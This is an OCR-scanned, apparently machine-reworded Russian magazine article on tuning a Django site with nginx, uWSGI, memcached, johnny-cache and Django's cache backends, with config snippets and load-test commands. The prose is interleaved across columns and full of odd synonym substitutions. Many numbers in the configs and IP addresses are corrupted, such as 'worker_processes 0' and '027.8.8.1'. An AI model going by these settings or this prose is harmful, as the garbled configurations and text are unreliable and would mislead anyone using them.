для того сом никак не во а ющихся : пichol.as/benchmaгk-of-python-web-seгveгs ) . Третий вопрос- кеширование. Ясно, что-нибудь сверх кеш а ни за что не обойтись да зачем реализован некто довольно из использованием memcached. Др угое дело, что-нибудь осложнение кешировгния многогранна да ее ре­ шение изо всех сил завязано получай специфику самого сайта. В статье автор сих строк

# vi /etc/nginx/nginx.conf # Для успехи максимальной n рои звод равным образом тель н ости делаем # чис л насчёт рабочих пр оцессов равным чи сл у nроцессор ны х яде р worker_processes 0 ; # Даем рабо ч им nроцессам побольше высок равным образом й nрио р итет worker_priority - 0; #Уменьшаем цифра вызовов get timeofday{), ч тоб ы # н е истрачивать резерв во п устую timer_resolution 0eems ; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { # Одновременное сумма конн е ктов, # обслуж равным образом ваемых одн да м р або чи м n роцессом worker_connections 0е24 ; # Оnция для того FreeBSD # use kqueue;

рассмотрим ряд « универсальных>> методов кеширования,

в фолиант числе топорное оберегание сгенерированных НТМL-страниц во

http {

памяти да прозрачное кеширование запросов ко БД, а и обсудим специфику применения тех иначе говоря иных методов. Наконец, автор сих строк должны чисто всё сие настроить, учитывая особенности используемого железа, количество оперативной памяти и т. д. Вопрос таковой т акже многогранен, так малость универсальных рекомендаций как ни говорите существует.

ПРИСТУПАЕМ Начнем, по образу равно паркет ожено, вместе с побег танов ки нужных нам программных

компонентов. Большинство с них питаться на репазитарии любого дис­ трибутива, вследствие чего на этом месте всё просто:

ХАКЕР

03/158/2012

DJАNGОИСПОЛЬЗУЕТВСЮ МОЩЬ ЯЗЫКА

PYTHON, ЧТОБЫ

МАКСИМАЛЬНО РАЗГРУЗИТЬ ПРОГРАММИСТА 125


SYN/ACK

Ш

fог unixoid_Ьlog pгoject.

Django settings

fгom os BASEDIR

impoгt

path

=path.diгnameCpath.abspathC __ file __ ))

DEBUG=r 0 TEMPLATE DEBUG=DEBUG ADMINS=С С 'Evgeny Zobnin' , ), MANAGERS=ADMINS +г

# 'postgгesql_psycopg2',

'sqliteЗ'

DATABASE ENGINE=

'postgгesql',

'mysql',

'sqliteЗ'

в рассуждении

'огасlе'.

DATABASE_NAME='db .sqlite' DATABASE_USER=' ' DATABASE_PASS~ORD

=

DATABASE_HDST= DATABASE_PDRT=' '

# # # #

# Ог path to database file if using sqliteЗ. used with sqliteЗ. used with sqliteЗ. to empty stгing fог localhost. Hot used with sqliteЗ. to empty stгing fог default. Hot used with sqliteЗ .

Not Not Set Set

TIME_ZDNE='Asya/Yekateгinbuгg' settings .py [pythonJ "settings.py" ВЗL, 0'1'15С Стандартный конфиг

#

[1,1J[1%J

Django ОЗУ, seпdfi l ell лишь вынудит nginx частосвопиться да тем самым за­

Станда ртные опции

медлит его работу. Оnция tcp_ пopush заставляет ngiпx исполнять

iпclude

/etc/пgiпx)mime.types;

access_log

/var/log/пgiпx/access.log;

НТТР-заголовки во одном движение кете, а симпатия бесполезна безо

# Вкл ючаем ис использование системного вызова seп dfile( )

sendfile.

GZIР-компрессия и может сыгрануть из сервером злую шутку.

seпdfile

оп;

С одной стороны, такая комnрессия уменьшаетобъем пере­

tcp_пopush

off;

даваемых сервером данных, вследствие чему симпатия можетуспеть

#

Держать kеераliv е-соединение открытым

keepalive_timeout #

Вклю чаем

gzip

05

пройти лишше заnросов, от другой- повышает нагрузку получай

секу нд

05 ;

GZI Р-компрессию

процессор, что-то nриводит для стоймя nротивоположному результату.

со

станда ртными

Поэтомуточно выяснить, нужна ли симпатия тебе, дозволяется всего лишь экспе­

опциями

оп;

риментальным путем, вдобавок эксnерименты надлежит прозябать

0100 ; gzip_buffers 04 0k ; gzip_comp_level 0; gzip_http_versioп 0 . 0; gzip_proxied апу; gzip_types text/plaiп applicatioп/xml applicatioп/x-javascript text/css;

лещадь предельной нагрузкой .

gzip_miп_leпgth

Теперь самое период предложить настройки сайта:

vi /etc/пgiпx/sites-eпaЬled/mysite server {

#

#

# На ~ тройки сайтов на отдельных конфигах (3то # станда ртный опись к De biaп

Порт

listeп

равным образом

прозвание

сайта

00 ;

server_пame

host.com;

iпclude /etc/пgiпx/sites-eпaЫed/*;

} Несколько ремарок:

Приоритет рабочих процессов нелишне изменять из осторожно­ стью, не то они могут просто-напросто <<задавить» всё-таки прочие сервисы,

начиная

memcached да

процессы базы данных. В идеале не чета

подвергнуть проверке работу

nginx вместе с дефолтными

ТЕСТИРОВАНИЕ ПРОИЗВОДИТЕЛЬНОСТИ

настройками равно лишь Протестировать мощность веб-сервера позволительно не без;

впоследствии наваливаться ко экспериментам.

use kqueue немногоускоряет работу ngiпx кайфовый FгeeBSD благодаря использованию механизма kqueue на смену паче мед­ ленного epoll. • Системный требование sendfilell применяется в целях единовременной от­ •

Опция

nравки содержимого целого файла во сокет. Метод от использованием

через утилиты аЬ изо комплекта

$

аЬ

-kc 000

-п

Apache:

00000 http://10.1.1.1/

Для сего опять же используется специальная план httpeгf:

сего вызова работает быстрее, нежели стандартное последователь­

ноекопированиеданных,ипозволяетсэкономитьнаоперативной памяти. Однако, кабы сервер оснащен недостаточным числом

026

$ httperf --hog --server=10.1.1.1 \ --wsess=2000,10,2 --rate 000 --timeout 0 ХАКЕР

03/158/201 0


Испытание нагрузкой

# Стандартные настройки журналирования access_log /var/ log / ngin x/ Ьlog-access.log ; error_log /var/ log /n gin x/Ьlog - error.log; # Адрес статики, используемой на админке Django location лN / media / { root / usr / local / lib / python2. 0/ dist-packages / django/contrib/admin; } # Статика самого сайта location л. + \.( jpg[jpeg [g if[png[ico [css [ zip[tgz [g z [rar [bz2[ [pdf[ppt[t xt[tar[ [bmp[js[mov) { root /var /www/host.com

N.

} # Адрес равным образом объем WSGI-гeйтa location / { uwsgi_pass 027.8 . 0.1 : 0812 ; include uwsgi_params;

Здес ь ни ложки необычного: указываем корневой регистр сайта

/vaг/www/host.com да а д рес uWSGI-cepвepa

027.0.0.1:8012. При­

ступаем для настройке Django да uWSGI.

НАСТРОЙКА DJANGO И UWSGI Настроит ь Dj ango чтобы совместного использования не без; uWSGI ужас

DJANGO 0.3 В

Django 0.3 синтаксис определения кеш-бэк - энда изменился равно

теnерь имеет нижеуказанный вид:

# Пример про memcached (два сервера) CACHES={ ' default' : 'BACKEND' : 'django . core.cache.backends.memcached. MemcachedCache' , 'LOCAТION' : [ '172.19.26.248:11211 ' , '172.19 . 06 . 042:11211 ' ,

# Пример ради БА CACHES={ 'default' : { 'BACKEND' : 'django.core.cache.backends.db. DatabaseCache' , 'LOCATION' : 'имя_ таблицы' ,

прос т о. Д ля сего будет облечь в тело и кровь три простых действия, которые перечислены ниже.

0.

Создать самовластно Django-npoeкт:

# cd /var/www # django-admin.py startproject mysite

import django.core.handlers.wsgi applicat ion=django.core.handlers.wsgi.WSGIHandler() 3. Запустить uWSGI-cepвep [опция "-р" определяе т доля

0. Поместить на образован ны й реестр двуха файла:

рабочих процессовl:

django.xml <uwsgi > <socket> 027.8 .8. 0 :8812 </socket> <pythonpath >/var/www/mysit e/</pythonpath > <module >django_wsgi </module> </uws gi > django_wsgi.py import os os.environ[ 'DJANGO_SETTINGS_MODULE' ]

# uwsgi

0 -s 027.8.8 .1 :8812

Скриптое автозапуска во комплекте uWSGI нет, вследствие чего послед­

нюю команду уймись общей сложности запятить куда-нибудь во /etc/гc . local:

# vi /etc/rc.local cd /var/www/mys ite uwsgi -р 0 -s 027.8.8.1:8812

'settings'

НАСТРОЙКА КЕШ-БЭК-ЭНДА Теперь всё что-то бы настроено равно работает, равным образом ты да я переходим к самой интересной равным образом важной части статьи. Кеширование крити­ чески животрепещуще на быстродействия любого динамического сайта, вне зависимости через технологий, для которых симпатия построе н . Мы должны опростить течение переваривания да отдачи сервером

динамической составляющей. Е сть небольшую толику способов решения этой задачи, хотя после этого всё зависит ото специфики веб-сайта. Во-первых, дозволительно твердолобо кешировать однако со тр аницы сайта. Это

самый азбучный равно по части ч ень несложно реализуемый вместе с п омо щь ю Dj ango способ. Однако возлюбленный является равно самым неэффективным: что угодно из­ менение страницы приведет ко промаху мимо иннокентий да повторной загрузке страницы на него. Изменение может бытовать каким угодно:

износ счетчика получай сайте, проклевывание нового коммента­ рия, освежение списка популярных статей да разделов. Поэтому полное кеширование имеет содержание вводить всего-навсего дл мы более­

больше статич ны х сайтов почитай блогов, вместе с л оварей, эн ц иклопедий и т. п.

Во-вторых, дозволено кешировать данные, загружаемые с БД. Также быстро реализуемый, однако адски открытый лицо оптимизации. Методы равно бэк-энды кеwирования во

ХАКЕР

03 /158/ 0012

Django

Он результативен исключительно чтобы тех сайтов, идеже осуществляется

027


SYN/ACK

бессчетно операций чтения изБДимало операций записи, ага равно в таком случае

CGI glue between Nginx and Django

едва во томик случае, когда само х ранилище кеш а работает быстрее

(higher is better)

механизма ко еширования базы данных . Другими словами, ке­

0500

ширование результатов выписка с БД подойдет, ещё раз же, для более-менее статичных сайтов, размещенных бери сервере, кото­ рый имеет веский количество памяти для того нормальной работы

0000

memcached. В-третьИх, кешировать не грех изредка изменяемые фрагмен­

u

с о (.)

твоя милость шаблонов. Этот манера подойдет чуть было не чтобы любого сай­

0500

~

та, некто полно дешев и, для моего воззрение , особо эффективен.

а;

Однако, на лента ото первых двух, возлюбленный требует работы напильни­

а.

%!

килоом равно безвыгодный имеет прямого взаимоотношения ко администрированию в качестве кого

0000

ф

:;,

таковому. Логикой равно архитектурой занимаются программисты.

~

Е

Также большое авторитет имеет одно изо двух хранилища пользу кого кешире-

000

ванных данных. Djaпgo предлагает нам хорошо варианта:

memcached- дорогой ценой на плане памяти, только ахти эффективно; оперативная память- больше затратно, однако равно не в такого склада мере эффективно;

жестковатый диск- куда неэффективно равным образом ужас дешево;

cgi middleware server

трест данных-более эффективно, только-только дороже.

0

Первые двум подойдут в целях владельцев выделенных серве­

0

fcgi (thread ed) gunicam (1 О

fcgi (prefark 0 О gunic am (2 gunicam (5 processors) workers) workers) О uwsgi (2 warkers) 0 uwsgi (5 wa rkers) О uwsgi ( 0О warkers)

0

workers)

ров, последние неуд позволительно прилагать для хостинге инедорогих

VPS'кax. Хотя, конечно, кризис миновал провести диагностику производитель­ ность на реальных условиях да поднять особливо приличествующий

Ненагрузачное опробывание

uWSGI

план .

Теперь по отношению том, вроде заключить кеш-хранилище. Здесь всё просто­

открываем settiпgs.py проекта равным образом пишем следующее: а ко , буде твоя милость решил, неграмотный чрезвычайно заморачиваясь не без; настройкой да

# Локальный memcached CACHE_BACKEND='memcached://127.0.0.1:11211/'

шаблонами , достичь некоторой оптимизации, в таком случае кеширование

#База безусловно нных ( ко ак соз доставить та блицу,

их одновременное кеширование невыгодный имеет смысла, всё же кеши­

всех страниц сайта да записей БД- твой выбор. Сразу скажу, что-то

об п иса хотя н иже)

рование вместе с траниц да записей в соответствии с отдельности, наравне аз многогрешный поуже упоминал,

CACHE_BACKEND='dЬ://имя_таблицы' # Файлова аз многогрешный систем а CACHE_BACKEND='filе:///nуть/до/файла' # Оперативная память CACHE_BACKEND='locmem:///' # Фи для т ивный ке ш (для раз в год по обещанию работки ) CACHE_BACKEND='dummy:///'

может наградить благодушный исход сверху паче иначе поменьше статичных са йтах.

Для включения кеширования просто-напросто сайта средствами Django достаточно вписать общей сложности пара изменения на settiпgs . py:

Во втором случае ничего не поделаешь вперед сотворить таблицу в базе данных. Делается сие из через стандартного maпage.py:

# python manage.py

createcachetaЫe

имя_таблицы

Любой субчик бэк-энда поддерживает следующие аргументы:

timeout- пора жизни кешираванных данных во секундах !по умолчанию 0001; т ахти eпtгies- максимальное состав записей на кеш е !по

# Вкл ю чаем ке ш ирован ие MIDDLEWARE_CLASSES=( # Важ а вселить э ту от троку на нача ле 'django.middleware.cache.CacheMiddleware' , #Здесь иду т по сию пору прочие mi ddleware .. • 'django.middleware.cache.FetchFromCacheMiddleware' , #

Указываем "с ро для

годности"

иннокентий на минута х

CACHE_MIDDLEWARE_SECONDS='Зee·

Это всё. Теперь любая сгенерированная изо шаблона этап

умол~а'нию 0001;

короче на удочку во кеш. Просто равным образом тупо. Несколько паче интел­

cull_fгequeпcy- барыш старых записей, которые удаляются

лектуальный сnособ заключается на исnользованиикешадля

по мнению достижении max_eпtгieslпo умолчанию 0, в таком случае принимать третья часть всех

хранения результатов цитата во БД . Для его реализации как бы единовременно

записей!.

равно нужен заданный раньше johnпy-cache, каковой использует

memcached на качестве бэк-энда. Активация осуществляется на три Для передачи аргументов используется синтаксис САСНЕ

BACKEND

CGI,

например:

"locmem:///?timeout=Зe&ma x_eпtries=4ee"

шага. Добавляем johпny-cache во прейскурант Оjаngо-приложений:

INSTALLED_APPS=( ' j ohnпy' ,

НАИБОЛЕЕ ЭФФЕКТИВНЫЙ МЕТОД КЕШИРОВАНИЯ-СОХРАНЕНИЕ

ТОЛЬКО ИЗБРАННЫХ ЧАСТЕЙ

Далее подключаем подходящий middleware:

MIDDLEWARE_CLASSES=( 'johnny.middleware. LocalStoreClearMiddleware ' , 'johnny.middleware.QueryCacheMiddleware ' ,

СГЕНЕ